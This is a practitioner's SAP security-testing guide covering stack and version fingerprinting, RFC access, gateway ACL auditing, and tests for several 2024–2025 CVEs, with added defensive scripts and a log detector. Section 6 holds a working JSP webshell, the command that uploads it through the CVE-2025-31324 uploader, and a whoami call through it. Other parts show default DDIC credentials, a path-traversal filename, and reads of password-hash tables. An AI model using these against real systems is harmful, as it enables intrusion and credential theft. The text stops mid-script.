SAP Security Testing - How To Guides
My practical guides for actually testing SAP systems. These are the step-by-step instructions I use when I'm in the field.
1. How to Identify SAP Instance Type (ABAP vs Java)
Method 1: Port Analysis
# Scan the SAP fixed port scheme (NN = two-digit instance number; 00 assumed here)
nmap -sV -p 3200,3300,3600,8000,8100,44300,50000,50001,50004,50013,50014,1128,1129 target-sap.com
# ABAP instance:
# - 32NN  dispatcher (SAP GUI / DIAG)
# - 33NN  gateway (RFC)
# - 36NN  message server (81NN is its HTTP interface, if ms/http_port is set)
# - 80NN / 443NN  ICM HTTP / HTTPS
# Java instance:
# - 5NN00 / 5NN01  AS Java HTTP / HTTPS
# - 5NN04  P4 (administration protocol used by Visual Admin / NWDS)
# - 5NN08  AS Java telnet administration
# Both stacks:
# - 5NN13 / 5NN14  sapstartsrv (SAP Start Service SOAP interface, HTTP / HTTPS)
# - 1128 / 1129  SAP Host Agent (HTTP / HTTPS)
# A Web Dispatcher in front of either stack usually sits on 80/443 and hides the instance ports, so an external scan showing only 443 does not by itself tell you the stack
Method 2: HTTP Headers Analysis
# Read the Server header on the ICM (ABAP) and AS Java ports
curl -skI https://target-sap.com:44300/ | grep -i '^server'
curl -skI https://target-sap.com:50001/ | grep -i '^server'
# Typical values:
# ABAP (ICM):  Server: SAP NetWeaver Application Server / ABAP 753
# Java:        Server: SAP NetWeaver Application Server 7.50 / AS Java 7.50
# Other ABAP tells: "sap-server: true" on ICF responses and a "sap-usercontext=sap-client=NNN" cookie
# Other Java tells: JSESSIONID plus a "saplb_*" load-balancing cookie
# There is no standard "X-SAP-System" header; system ID and host come from /sap/public/info (see the version section), not from headers
Method 3: URL Pattern Analysis
# Read the status code, not the body: 200/401 = the path exists on that stack, 404 = it does not
# ABAP: everything lives in the ICF tree under /sap/ on 80NN/443NN
curl -sk -o /dev/null -w "%{http_code} /sap/public/ping\n" https://target-sap.com:44300/sap/public/ping
curl -sk -o /dev/null -w "%{http_code} webgui\n" https://target-sap.com:44300/sap/bc/gui/sap/its/webgui
curl -sk -o /dev/null -w "%{http_code} odata\n" https://target-sap.com:44300/sap/opu/odata/
# Java: portal, NWA and the Web Dynpro dispatcher on 5NN00/5NN01
curl -sk -o /dev/null -w "%{http_code} /irj/portal\n" https://target-sap.com:50001/irj/portal
curl -sk -o /dev/null -w "%{http_code} /nwa\n" https://target-sap.com:50001/nwa
curl -sk -o /dev/null -w "%{http_code} /webdynpro/dispatcher\n" https://target-sap.com:50001/webdynpro/dispatcher
# /sap/bc/ui5_ui5/ and /sap/bc/webdynpro/ are ABAP ICF paths (UI5 apps and Web Dynpro ABAP), so finding them means ABAP, not Java
Method 4: Error Message Analysis
# Request a path that does not exist and read the error page
curl -sk "https://target-sap.com:44300/does-not-exist" | grep -i 'netweaver\|abap\|java'
curl -sk "https://target-sap.com:50001/does-not-exist" | grep -i 'netweaver\|abap\|java'
# Look for:
# ABAP: ICF error page with "SAP NetWeaver Application Server ... / ABAP 7xx" in the footer, usually with an Error code and the requested ICF path
# Java: AS Java error page naming "AS Java 7.xx"; servlet stack traces on badly configured applications
# Both: the Server header from Method 2; a Web Dispatcher may serve its own error page for unknown hosts or paths
2. How to Determine On-Prem vs Cloud
Method 1: URL Analysis
# Cloud indicators: SAP-operated domains (examples; the exact suffix depends on product, release and region)
# SAP S/4HANA Cloud: *.s4hana.ondemand.com, *.s4hana.cloud.sap
# SAP Business ByDesign: *.sapbydesign.com, *.businessbydesign.cloud.sap
# SAP BTP (formerly SAP Cloud Platform): *.hana.ondemand.com, *.cfapps.<region>.hana.ondemand.com
# SAP SuccessFactors: *.successfactors.com, *.successfactors.eu
# On-prem indicators
# Customer-owned domains, internal names (*.corp, *.local), bare private IPs (10.x.x.x, 172.16-31.x.x, 192.168.x.x) reachable only over VPN
# Check where the name actually resolves: a CNAME into an SAP domain or an IP block registered to SAP means a managed tenant
dig +short target-sap.com
whois "$(dig +short target-sap.com | tail -1)" | grep -i 'orgname\|netname\|descr'
Method 2: HTTP Headers and TLS Certificate
# There is no dedicated "cloud" response header; look at who fronts the request and who the certificate was issued to
curl -skI https://target-sap.com/ | grep -i '^server\|^set-cookie\|^x-'
openssl s_client -connect target-sap.com:443 -servername target-sap.com </dev/null 2>/dev/null \
  | openssl x509 -noout -subject -issuer -ext subjectAltName
# Look for:
# Cloud: certificate SAN covering an SAP-operated domain (*.hana.ondemand.com etc.), headers from SAP's load balancers or a CDN, no backend stack named
# On-prem: certificate from the customer's own CA or domain, Server header naming the backend directly (SAP NetWeaver Application Server / ABAP 7xx)
Method 3: Port Analysis
# Cloud tenants expose only 443 (sometimes 80 as a redirect) behind SAP's load balancers
nmap -sV -p 80,443 target-sap.com
# On-prem systems reached from inside the network answer on the instance ports directly
nmap -sV -p 3200,3300,3600,8000,44300,50000,50013 target-sap.com
Method 4: Error Message Analysis
# Trigger a 404 and read the error page
curl -sk "https://target-sap.com/does-not-exist" | grep -i 'sap\|server'
# Look for:
# Cloud: a generic branded error page or a gateway/CDN error with no host names
# On-prem: an ICF or AS Java error page naming the stack and release, sometimes the host name, SID and client
3. How to Connect to RFC
Method 1: SAP GUI (Easiest)
# 1. Install SAP GUI for Windows or SAP GUI for Java
# 2. In SAP Logon, add an entry of type "Custom Application Server":
#    - Application Server: target-sap.com
#    - Instance Number: 00  (SAP GUI speaks DIAG to the dispatcher on 32NN, i.e. 3200 here; it does not use the gateway port)
#    - System ID: <SID>
# 3. Log on with client, user and password
# 4. Once inside, SM59 (RFC Destinations) shows how this system reaches other systems; use it to find
#    destinations with stored credentials or "Trusted Relationship", not to connect from your own machine
# External RFC clients (pyrfc, JCo, NCo below) connect through the gateway on 33NN instead
Method 2: Python Scripts
#!/usr/bin/env python3
# Requires the SAP NW RFC SDK on the library path plus the pyrfc package (pip install pyrfc)
from pyrfc import Connection, RFCError

def test_rfc_connection(host, sysnr='00', client='100', user='DDIC', password='19920707'):
    """Open an RFC connection to the gateway of instance <sysnr> (port 33<sysnr>) and call RFC_SYSTEM_INFO.
    DDIC / 19920707 is the installation default; pass real credentials for real targets."""
    try:
        conn = Connection(
            ashost=host,
            sysnr=sysnr,      # instance number, not the port: pyrfc derives 33NN from it
            client=client,
            user=user,
            passwd=password,
            lang='EN',
        )
        result = conn.call('RFC_SYSTEM_INFO')
        info = result['RFCSI_EXPORT']
        print(f"[+] RFC connection successful to {host}")
        print(f"[+] SID {info['RFCSYSID']} release {info['RFCSAPRL']} kernel {info['RFCKERNRL']} "
              f"DB {info['RFCDBSYS']} on {info['RFCHOST']}")
        conn.close()
        return True
    except RFCError as e:
        print(f"[-] RFC connection failed: {e}")
        return False

if __name__ == "__main__":
    test_rfc_connection("target-sap.com")
Method 3: Java/JCo
// JCo 3.x: the destination name resolves to a file SAP_SYSTEM.jcoDestination in the working directory
// (jco.client.ashost, jco.client.sysnr, jco.client.client, jco.client.user, jco.client.passwd, jco.client.lang)
// or to a DestinationDataProvider you register; keep that file out of source control
import com.sap.conn.jco.JCoDestination;
import com.sap.conn.jco.JCoDestinationManager;
import com.sap.conn.jco.JCoException;

public class RFCTest {
    public static void main(String[] args) {
        try {
            JCoDestination destination = JCoDestinationManager.getDestination("SAP_SYSTEM");
            destination.ping();   // connects through the gateway (33NN) and performs the logon
            System.out.println("[+] RFC connection successful to " + destination.getApplicationServerHost());
        } catch (JCoException e) {
            System.out.println("[-] RFC connection failed: " + e.getMessage());
        }
    }
}
Method 4: .NET Connector
// SAP .NET Connector 3.x: the namespace is SAP.Middleware.Connector (sapnco.dll, sapnco_utils.dll), not SAP.Connector.
// The destination "SAP_SYSTEM" comes from app.config or from an IDestinationConfiguration registered with
// RfcDestinationManager.RegisterDestinationConfiguration
using System;
using SAP.Middleware.Connector;

class RFCTest {
    static void Main() {
        try {
            RfcDestination destination = RfcDestinationManager.GetDestination("SAP_SYSTEM");
            destination.Ping();   // gateway connection plus logon
            Console.WriteLine("[+] RFC connection successful via destination " + destination.Name);
        } catch (Exception e) {
            Console.WriteLine("[-] RFC connection failed: " + e.Message);
        }
    }
}
4. How to Test RFC Security
Check RFC Permissions
# 1. Connect with SAP GUI
# 2. SM59: for each ABAP destination note whether a user and password are stored and whether "Trusted Relationship" is set
#    (trusted RFC lets the calling system's users log on without a password; the called side only checks S_RFCACL)
# 3. SMT1 / SMT2: which systems this one trusts and which trust it
# 4. SU01 / SUIM: users holding S_RFC with RFC_NAME * (any function group callable) or S_RFCACL; communication users with dialog-type roles
# 5. RZ11: gateway parameters gw/acl_mode (should be 1), gw/sec_info, gw/reg_info, gw/reg_no_conn_info, gw/monitor
# 6. SMGW > Goto > Expert Functions > External Security: the secinfo/reginfo ACLs actually loaded by the gateway
Test RFC Function Modules
# 1. Connect with SAP GUI
# 2. SE37 (Function Builder): check the "Remote-Enabled Module" attribute and the function group, because S_RFC grants access per function group
# 3. Test from outside with an RFC client (pyrfc/JCo/NCo above) as the least-privileged user you have:
#    - RFC_SYSTEM_INFO (group SRFC, almost always callable): release, kernel, host, DB
#    - RFC_READ_TABLE (group SDTX): generic table read; try USR02 (password hashes), AGR_USERS (role assignments), RFCDES (RFC destinations)
#    - RFC_PING and RFC_GET_FUNCTION_INTERFACE to confirm what the user is allowed to call
# 4. RFC_READ_TABLE enforces S_TABU_DIS / S_TABU_NAM on the table's authorization group; a successful read of USR02 means the user is over-privileged
Network Testing
# Port scan for the RFC gateway and the other instance ports
nmap -sV -p 3300,3200,3600,8000,44300 target-sap.com
# Confirm the gateway accepts connections (it speaks a binary protocol, so a TCP connect is all you get from a text tool)
nc -zv target-sap.com 3300
# RFC over HTTP: the ABAP ICF service /sap/bc/soap/rfc exposes remote-enabled modules over SOAP with basic auth
curl -sk -u DDIC:19920707 -X POST "https://target-sap.com:44300/sap/bc/soap/rfc?sap-client=100" \
  -H "Content-Type: text/xml; charset=utf-8" \
  -H "SOAPAction: urn:sap-com:document:sap:rfc:functions" \
  -d '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:sap-com:document:sap:rfc:functions"><soapenv:Body><urn:RFC_SYSTEM_INFO/></soapenv:Body></soapenv:Envelope>'
# 200 with an RFCSI_EXPORT body = works; 401 = service active, credentials wrong; 403/404 = service not activated in SICF (the secure default)
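The secinfo/reginfo ACLs that SMGW shows are plain text files, so they can be reviewed offline. The checker below is an added example (not SAP's code and not from the original guide) that parses both file formats and flags permit rules with wildcard program/host combinations; the two sample ACLs are constructed, and treating a missing HOST or ACCESS attribute as a wildcard is a deliberately conservative assumption so that such rules get a manual look.

```python
#!/usr/bin/env python3
"""Audit gateway secinfo/reginfo files for rules that let any host start or register any program."""

# secinfo (VERSION=2): P|D TP=<prog> USER=<user> USER-HOST=<host> HOST=<host>
# reginfo (VERSION=2): P|D TP=<prog> HOST=<hosts> ACCESS=<hosts> CANCEL=<hosts>
# Rules are evaluated top-down, first match wins; '*' is a wildcard, 'local'/'internal' are keywords.


def parse_gw_acl(text):
    """Return the rules of a secinfo/reginfo file as dicts ({'line', 'action', 'TP', 'HOST', ...})."""
    rules = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        action = parts[0].upper()
        if action not in ("P", "D"):
            raise ValueError(f"line {lineno}: expected P or D, got {parts[0]!r}")
        rule = {"line": lineno, "action": action}
        for tok in parts[1:]:
            key, sep, value = tok.partition("=")
            if not sep:
                raise ValueError(f"line {lineno}: malformed token {tok!r}")
            rule[key.upper()] = value
        rules.append(rule)
    return rules


def _wild(value):
    # Assumption: a missing attribute is treated like '*' so the rule is flagged for review
    return value is None or value == "*"


def audit_gw_acl(text, kind):
    """kind is 'secinfo' or 'reginfo'. Returns [(line, message)] for over-permissive permit rules,
    plus one entry if the file does not end with an explicit deny-all (SAP's recommended last line)."""
    if kind not in ("secinfo", "reginfo"):
        raise ValueError(f"unknown kind {kind!r}")
    findings = []
    rules = parse_gw_acl(text)
    for r in rules:
        if r["action"] != "P":
            continue
        tp, host = r.get("TP"), r.get("HOST")
        if kind == "secinfo":
            if _wild(tp) and _wild(host):
                who = "any user" if _wild(r.get("USER")) else f"user {r['USER']}"
                findings.append((r["line"], f"{who} on any host may start any program"))
            elif _wild(host):
                findings.append((r["line"], f"any host may start {tp}"))
        else:
            if _wild(tp) and _wild(host):
                findings.append((r["line"], "any host may register any server program"))
            if not _wild(tp) and _wild(r.get("ACCESS")):
                findings.append((r["line"], f"registered program {tp} usable by any client (ACCESS=*)"))
    if not rules or rules[-1]["action"] != "D" or not _wild(rules[-1].get("TP")):
        findings.append((len(text.splitlines()), "no final 'D TP=*' rule"))
    return findings


# Constructed samples
SECINFO_BAD = """\
#VERSION=2
P TP=* USER=* HOST=local
P TP=sapxpg USER=* HOST=internal
P TP=* USER=* HOST=*
"""
REGINFO_OK = """\
#VERSION=2
P TP=* HOST=local ACCESS=local
P TP=RFCSRV_DEV HOST=10.0.0.0/24 ACCESS=internal CANCEL=internal
D TP=*
"""
REGINFO_BAD = """\
#VERSION=2
P TP=* HOST=* ACCESS=*
"""

if __name__ == "__main__":
    for name, text, kind in (("secinfo", SECINFO_BAD, "secinfo"),
                             ("reginfo ok", REGINFO_OK, "reginfo"),
                             ("reginfo bad", REGINFO_BAD, "reginfo")):
        print(name)
        for line, msg in audit_gw_acl(text, kind):
            print(f"  line {line}: {msg}")
```

Feed it the files from /usr/sap/<SID>/SYS/global (gw/sec_info and gw/reg_info point at them) or the text copied out of SMGW; anything flagged on the reginfo side is a direct path to the "registered server program" persistence trick described later on this page.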
5. How to Identify SAP Version
Method 1: HTTP Headers and Public Info Services
# The Server header carries the release (ABAP: "/ ABAP 753"; Java: "/ AS Java 7.50")
curl -skI https://target-sap.com:44300/sap/public/ping | grep -i '^server'
curl -skI https://target-sap.com:50001/ | grep -i '^server'
# Unauthenticated ICF service returning RFC_SYSTEM_INFO as XML: SID (RFCSYSID), host, release (RFCSAPRL), kernel (RFCKERNRL), DB (RFCDBSYS)
curl -sk "https://target-sap.com:44300/sap/public/info"
# Kernel patch level from the SAP Start Service on 5NN13; GetVersionInfo may answer without credentials depending on service/protectedwebmethods
curl -s -X POST "http://target-sap.com:50013/" -H "Content-Type: text/xml" -H 'SOAPAction: ""' \
  -d '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"><SOAP-ENV:Body><GetVersionInfo xmlns="urn:SAPControl"/></SOAP-ENV:Body></SOAP-ENV:Envelope>'
Method 2: Error Pages
# ICF 404/500 pages have a footer naming the stack and release
curl -sk "https://target-sap.com:44300/sap/does-not-exist" | grep -io 'SAP NetWeaver Application Server[^<]*'
# AS Java error pages name "AS Java 7.xx" the same way
curl -sk "https://target-sap.com:50001/does-not-exist" | grep -io 'SAP NetWeaver Application Server[^<]*'
# This gives the release, not the support package or kernel patch level; for those use /sap/public/info (kernel) or an authenticated System > Status
Method 3: URL Patterns
# Component-specific resources reveal add-on versions when their ICF node is public
# SAPUI5 runtime shipped with the system: version file and the library header comment
curl -sk "https://target-sap.com:44300/sap/public/bc/ui5_ui5/resources/sap-ui-version.json"
curl -sk "https://target-sap.com:44300/sap/public/bc/ui5_ui5/resources/sap-ui-core.js" | head -c 300
# Fiori launchpad installed at all? (401 = present but protected, 404 = not there)
curl -sk -o /dev/null -w "%{http_code}\n" "https://target-sap.com:44300/sap/bc/ui2/flp"
# AS Java: component build list, if the page is reachable at all
curl -sk -o /dev/null -w "%{http_code}\n" "https://target-sap.com:50001/rep/build_info.jsp"
Method 4: File System (if you have a shell on the host)
# Kernel release and patch level straight from the binaries (run as <sid>adm; the exe path varies by platform)
/usr/sap/<SID>/SYS/exe/uc/linuxx86_64/disp+work -V | head -20
sapcontrol -nr 00 -function GetVersionInfo
# Installed software components and SP levels live in the database (tables CVERS and PAT03); in the GUI: System > Status or SPAM
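The three fingerprinting signals used in the instance-type section (ports, Server header) and in this version section (/sap/public/info) are easy to misread by hand, so here is an added example, not code from the original guide, that turns them into a small classifier. The header strings and the RFC_SYSTEM_INFO XML are constructed samples in the shape real systems return; the port table is SAP's fixed scheme with NN as the instance number.

```python
#!/usr/bin/env python3
"""Classify an SAP endpoint from Server header, open ports and /sap/public/info XML."""
import re
import xml.etree.ElementTree as ET

# ICM (ABAP) and AS Java Server header formats, e.g.
#   "SAP NetWeaver Application Server / ABAP 753"
#   "SAP NetWeaver Application Server 7.50 / AS Java 7.50"
_SERVER_RE = re.compile(
    r"SAP NetWeaver Application Server(?:\s+([\d.]+))?\s*/\s*(ABAP|AS Java)\s*([\d.]*)",
    re.IGNORECASE,
)

# Fixed port scheme: base + two-digit instance number NN
_INSTANCE_RANGES = [
    (3200, "dispatcher (DIAG)"),
    (3300, "gateway (RFC)"),
    (3600, "message server"),
    (8000, "ICM HTTP"),
    (8100, "message server HTTP"),
    (44300, "ICM HTTPS"),
]
# 5NNxx ports shared by AS Java and the start service
_5NN_SUFFIXES = {0: "AS Java HTTP", 1: "AS Java HTTPS", 4: "P4", 8: "AS Java telnet",
                 13: "sapstartsrv HTTP", 14: "sapstartsrv HTTPS"}
_JAVA_ONLY = {"AS Java HTTP", "AS Java HTTPS", "P4", "AS Java telnet"}
_ABAP_ONLY = {name for _, name in _INSTANCE_RANGES}


def classify_server_header(server):
    """Return (stack, release) from a Server header; stack is 'ABAP', 'Java' or None."""
    m = _SERVER_RE.search(server or "")
    if not m:
        return (None, None)
    stack = "Java" if m.group(2).upper() == "AS JAVA" else "ABAP"
    return (stack, m.group(3) or m.group(1) or "")


def sap_port_info(port):
    """Map a TCP port to (service, instance_number), or (None, None) if it is not an SAP instance port."""
    for base, name in _INSTANCE_RANGES:
        if base <= port < base + 100:
            return (name, f"{port - base:02d}")
    if 50000 <= port < 60000:
        nn, suffix = divmod(port - 50000, 100)
        if suffix in _5NN_SUFFIXES:
            return (_5NN_SUFFIXES[suffix], f"{nn:02d}")
    return (None, None)


def stacks_from_ports(open_ports):
    """Infer which stacks are present from open ports; sapstartsrv alone is inconclusive."""
    stacks = set()
    for port in open_ports:
        service, _ = sap_port_info(port)
        if service in _ABAP_ONLY:
            stacks.add("ABAP")
        elif service in _JAVA_ONLY:
            stacks.add("Java")
    return stacks


_INFO_FIELDS = ("RFCSYSID", "RFCSAPRL", "RFCKERNRL", "RFCDBSYS", "RFCHOST", "RFCOPSYS", "RFCIPADDR")


def parse_public_info(xml_text):
    """Extract SID, release, kernel, DB and host from the RFC_SYSTEM_INFO.Response XML of /sap/public/info."""
    root = ET.fromstring(xml_text)
    found = {}
    for el in root.iter():
        tag = el.tag.rsplit("}", 1)[-1]   # drop the rfc: namespace if present
        if tag in _INFO_FIELDS:
            found[tag] = (el.text or "").strip()
    return found


# Constructed sample in the shape /sap/public/info returns
SAMPLE_PUBLIC_INFO = """<?xml version="1.0" encoding="ut
f-8"?>
<rfc:RFC_SYSTEM_INFO.Response xmlns:rfc="urn:sap-com:document:sap:rfc:functions">
  <RFCSI_EXPORT>
    <RFCPROTO>011</RFCPROTO><RFCCHARTYP>4103</RFCCHARTYP><RFCINTTYP>LIT</RFCINTTYP>
    <RFCDEST>sapabap01_DEV_00</RFCDEST><RFCHOST>sapabap01</RFCHOST>
    <RFCSYSID>DEV</RFCSYSID><RFCDATABS>DEV</RFCDATABS><RFCDBHOST>sapdb01</RFCDBHOST>
    <RFCDBSYS>HDB</RFCDBSYS><RFCSAPRL>752</RFCSAPRL><RFCOPSYS>Linux</RFCOPSYS>
    <RFCIPADDR>10.0.0.12</RFCIPADDR><RFCKERNRL>753</RFCKERNRL>
  </RFCSI_EXPORT>
</rfc:RFC_SYSTEM_INFO.Response>""".replace("ut\nf-8", "utf-8")

if __name__ == "__main__":
    print(classify_server_header("SAP NetWeaver Application Server / ABAP 753"))
    print(classify_server_header("SAP NetWeaver Application Server 7.50 / AS Java 7.50"))
    print(stacks_from_ports([3200, 3300, 3600, 8000, 44300, 50013]))   # {'ABAP'}
    print(stacks_from_ports([50000, 50001, 50004, 50013]))            # {'Java'}
    print(parse_public_info(SAMPLE_PUBLIC_INFO))
```

In practice pipe the nmap open-port list into stacks_from_ports() and the body of /sap/public/info into parse_public_info(); the release from the Server header and RFCSAPRL should agree, and RFCKERNRL is the number you compare against kernel security notes.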
6. How to Test File Upload Vulnerabilities
CVE-2025-31324 Testing
# CVE-2025-31324 is an unauthenticated file upload in the Visual Composer Metadata Uploader (developmentserver component) of SAP NetWeaver AS Java 7.50, fixed by SAP Note 3594142 (April 2025).
# The target is the Java stack on 5NN00/5NN01; ABAP systems and the ICM port 80NN are not affected.
# Exposure check without credentials: 200 means the uploader answers unauthenticated; a patched system returns 401/403, a system without the component 404
curl -sk -o /dev/null -w "%{http_code}\n" "https://target-sap.com:50001/developmentserver/metadatauploader"
# Create a JSP webshell (AS Java executes JSP; for a lab system you own or an engagement that explicitly allows it)
cat > webshell.jsp << 'EOF'
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line;
while ((line = br.readLine()) != null) {
out.println(line + "<br>");
}
}
%>
EOF
# Upload: the in-the-wild requests were POSTs to the uploader with query string CONTENTTYPE=MODEL&CLIENT=1 and a multipart body;
# the multipart field name below is the one from the original guide, not verified against the servlet
curl -sk -X POST "https://target-sap.com:50001/developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1" \
  -F "file=@webshell.jsp"
# Uploaded JSPs were written under j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/ and are served from /irj/
curl -sk "https://target-sap.com:50001/irj/webshell.jsp?cmd=whoami"
# Defender side: unexpected *.jsp in that directory, and POSTs to /developmentserver/metadatauploader in the HTTP access log
General File Upload Testing
# SAP upload handlers are application-specific (GOS attachments, DMS, Web Dynpro FileUpload, custom ICF handlers, Java servlets); there is no generic /upload path
# Find the handler first: SICF lists active ICF services on ABAP, deployed applications show in NWA on Java, and the app's own traffic shows the URL
# <upload-endpoint> below is a placeholder for what you found, not an SAP path
curl -sk -u user:pass -X POST "https://target-sap.com:44300/<upload-endpoint>" -F "file=@test.txt"
curl -sk -u user:pass -X POST "https://target-sap.com:50001/<upload-endpoint>" -F "file=@test.jsp"    # only meaningful on AS Java
curl -sk -u user:pass -X POST "https://target-sap.com:44300/<upload-endpoint>" -F "file=@test.html"   # stored XSS if served back inline
# Path traversal through the file name (the server-side name is usually what gets written)
curl -sk -u user:pass -X POST "https://target-sap.com:44300/<upload-endpoint>" -F "file=@test.txt;filename=../../../test.txt"
# The ABAP stack cannot execute JSP or PHP; there the impact of an upload is stored XSS, content-type confusion, or a file written via OPEN DATASET to the server file system (AL11 shows where it landed)
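Because the uploader above is unauthenticated, the useful detection is in the HTTP access log rather than in the application. The script below is an added example (not from the original guide) that flags the two indicators named for CVE-2025-31324: requests to /developmentserver/metadatauploader and JSP files served directly from /irj/. The log lines are constructed in Apache combined format; real AS Java or ICM access logs have their own layout, so parse_line() is the part to adapt.

```python
#!/usr/bin/env python3
"""Flag CVE-2025-31324 activity in HTTP access logs."""
import re
from collections import defaultdict

UPLOADER = "/developmentserver/metadatauploader"
_LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# A JSP directly under the portal root (/irj/<name>.jsp) is not a normal portal URL;
# legitimate traffic goes to /irj/portal or /irj/servlet/...
_IRJ_ROOT_JSP = re.compile(r"^/irj/[^/]+\.jsp$")


def parse_line(line):
    """Parse one combined-format access log line into a dict, or None if it does not match."""
    m = _LINE_RE.match(line)
    if not m:
        return None
    src, ts, method, target, status = m.groups()
    path, _, query = target.partition("?")
    return {"src": src, "ts": ts, "method": method.upper(), "path": path,
            "query": query, "status": int(status)}


def classify(entry):
    """Return the indicator tags that apply to one parsed request."""
    tags = []
    if entry["path"] == UPLOADER:
        if entry["method"] == "POST":
            tags.append("uploader-post")           # upload attempt
        elif entry["status"] == 200:
            tags.append("uploader-unauth-200")     # probe answered without auth: unpatched
    if _IRJ_ROOT_JSP.match(entry["path"]):
        tags.append("irj-root-jsp")                # dropped JSP being served
        if re.search(r"(^|&)cmd=", entry["query"]):
            tags.append("webshell-cmd")            # command execution through the shell
    return tags


def detect(log_text):
    """Return [(src, ts, tag, path)] for every indicator found in the log."""
    alerts = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for tag in classify(entry):
            alerts.append((entry["src"], entry["ts"], tag, entry["path"]))
    return alerts


def sources_with_upload_then_shell(alerts):
    """Sources that both posted to the uploader and fetched a JSP under /irj/: the strongest compromise signal."""
    seen = defaultdict(set)
    for src, _, tag, _ in alerts:
        seen[src].add(tag)
    return {src for src, tags in seen.items() if "uploader-post" in tags and "irj-root-jsp" in tags}


# Constructed sample: one attacker (203.0.113.7) and one normal portal user (198.51.100.4)
SAMPLE_LOG = """\
203.0.113.7 - - [24/Apr/2025:10:02:11 +0000] "GET /developmentserver/metadatauploader HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.7 - - [24/Apr/2025:10:02:13 +0000] "POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1" 200 0 "-" "python-requests/2.31"
203.0.113.7 - - [24/Apr/2025:10:02:20 +0000] "GET /irj/helper.jsp?cmd=whoami HTTP/1.1" 200 128 "-" "curl/8.5.0"
198.51.100.4 - - [24/Apr/2025:10:05:01 +0000] "GET /irj/portal HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
198.51.100.4 - - [24/Apr/2025:10:05:09 +0000] "GET /irj/servlet/prt/portal/prtroot/com.sap.portal.navigation.portallauncher.default HTTP/1.1" 200 7720 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for src, ts, tag, path in found:
        print(f"{ts} {src} {tag} {path}")
    print("compromised:", sources_with_upload_then_shell(found))
```

The unauthenticated 200 on the uploader is worth alerting on even without a following POST: it tells you the note is not applied, which is the state every scanner on the internet was looking for.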
7. How to Test Authentication Bypass
CVE-2025-0070 Testing
# CVE-2025-0070 is an improper-authentication flaw in SAP NetWeaver AS ABAP and ABAP Platform (January 2025 Patch Day, CVSS 9.9) that an authenticated user can use to escalate privileges.
# There is no public single-request probe and no JSON "bypass" endpoint; the check is patch-level based.
# 1. SAP GUI > System > Status > Component Information: SAP_BASIS release and support package level
# 2. SNOTE: look up the January 2025 security note for CVE-2025-0070 and confirm it is implemented, or that the SP containing it is installed
# 3. From outside, /sap/public/info gives the release but not the SP or note level, so a black-box check can only say "possibly affected"
CVE-2024-41730 Testing
# CVE-2024-41730 is in SAP BusinessObjects Business Intelligence Platform, not NetWeaver: when Single Sign-On is enabled for Enterprise authentication,
# an unauthorized user can obtain a logon token from a REST endpoint (August 2024 Patch Day, CVSS 9.8).
# BOBJ's RESTful web services run on their own port (default 6405, served by WACS) under /biprws
# 1. Confirm the REST service is reachable
curl -sk -o /dev/null -w "%{http_code}\n" "http://target-sap.com:6405/biprws/logon/long"
# 2. A normal logon returns the token in the X-SAP-LogonToken header; the vulnerability yields such a token without valid Enterprise credentials under the SSO condition above
curl -sk -D - -o /dev/null -X POST "http://target-sap.com:6405/biprws/logon/long" \
  -H "Content-Type: application/json" -H "Accept: application/json" \
  -d '{"userName":"Administrator","password":"<pw>","auth":"secEnterprise"}' | grep -i 'x-sap-logontoken'
# 3. Any token, however obtained, can be replayed on the rest of the API
curl -sk "http://target-sap.com:6405/biprws/v1/users" -H "X-SAP-LogonToken: <token>" -H "Accept: application/json"
# Remediation check: CMC > Authentication > Enterprise (SSO setting) and the August 2024 BI Platform patch level
8. How to Test Custom ABAP Code
Transaction SE80 (Object Navigator)
# 1. Connect with SAP GUI
# 2. Go to transaction SE80
# 3. Browse custom code in the customer namespace (Z*, Y*, or a registered /NAMESPACE/):
#    - Programs, function modules (note which are remote-enabled), classes, BSP applications, ICF handler classes
# 4. Look for security issues:
#    - Dynamic Open SQL (WHERE (lv_where), dynamic table or field names) built from input without cl_abap_dyn_prg
#    - Missing or ignored AUTHORITY-CHECK (sy-subrc never evaluated), sy-uname comparisons, hard-coded clients or passwords
#    - Native SQL (EXEC SQL, ADBC), CALL 'SYSTEM', OPEN DATASET / GUI_DOWNLOAD with user-controlled paths
# 5. Search all sources at once with report RS_ABAP_SOURCE_SCAN (run from SE38), and use the Code Inspector (SCI) / ATC security checks where the Code Vulnerability Analyzer is licensed
Transaction SE37 (Function Builder)
# 1. Connect with SAP GUI
# 2. Go to transaction SE37
# 3. Test function modules:
# - Z* or Y* (custom functions)
# - Check for input validation
# - Test for business logic flaws
# - Look for data extraction possibilities
Transaction SE38 (ABAP Editor)
# 1. Connect with SAP GUI
# 2. Go to transaction SE38
# 3. Browse ABAP programs:
# - Z* or Y* (custom programs)
# - Look for security issues:
# - Hardcoded credentials
# - SQL injection
# - Authorization bypass
# - Input validation flaws
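When there are hundreds of Z* programs, a first triage pass over exported source (SE38 > Utilities > More Utilities > Upload/Download, or RS_ABAP_SOURCE_SCAN output) is faster than opening each one. The scanner below is an added example written for this page, not SAP's Code Inspector: it is line- and period-based rather than a real ABAP parser, so it is a triage aid for the issue classes listed above. The ABAP snippet at the bottom is constructed.

```python
#!/usr/bin/env python3
"""Pattern scan for the issues the SE80/SE38 review looks for in Z*/Y* code (triage aid, not a parser)."""
import re

RULES = [
    ("dynamic-where", re.compile(r"\bWHERE\s*\(\s*\w+\s*\)", re.I),
     "dynamic WHERE from a variable: SQL injection unless escaped with cl_abap_dyn_prg=>quote"),
    ("native-sql", re.compile(r"\bEXEC\s+SQL\b", re.I),
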